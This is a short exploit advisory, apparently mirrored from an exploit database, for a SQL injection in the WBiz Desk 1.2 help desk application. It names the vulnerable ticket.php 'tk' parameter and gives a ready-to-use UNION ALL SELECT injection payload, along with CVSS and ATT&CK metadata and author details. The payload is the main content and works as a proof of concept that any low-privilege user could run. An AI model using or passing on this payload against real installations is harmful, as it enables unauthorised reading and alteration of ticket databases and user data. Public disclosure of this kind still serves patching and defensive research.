Share
## https://sploitus.com/exploit?id=PACKETSTORM:172475
[#] Exploit Title: WBiz Desk 1.2 - SQL Injection  
[#] Exploit Date: May 12, 2023.  
[#] CVSS 3.1: 6.4 (Medium)  
[#] CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N  
[#] Tactic: Initial Access (TA0001)  
[#] Technique: Exploit Public-Facing Application (T1190)  
[#] Application Name: WBiz Desk  
[#] Application Version: 1.2  
[#] Link: https://www.codester.com/items/5641/wbiz-desk-simple-and-effective-help-desk-system  
  
  
[#] Author: h4ck3r - Faisal Albuloushi  
[#] Contact: SQL@hotmail.co.uk  
[#] Blog: https://www.0wl.tech  
  
  
[#] 3xploit:  
  
[path]//ticket.php?tk=[SQL Injection]  
  
  
[#] 3xample:  
  
[path]/ticket.php?tk=83' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b6a6b71,0x534d6e485a74664750746b7553746a556b414e7064624b7672626b42454c74674f5669436a466a53,0x71626b6b71),NULL,NULL,NULL-- -  
  
  
[#] Notes:  
- The vulnerability requires a non-admin privilege (normal) user to be exploited.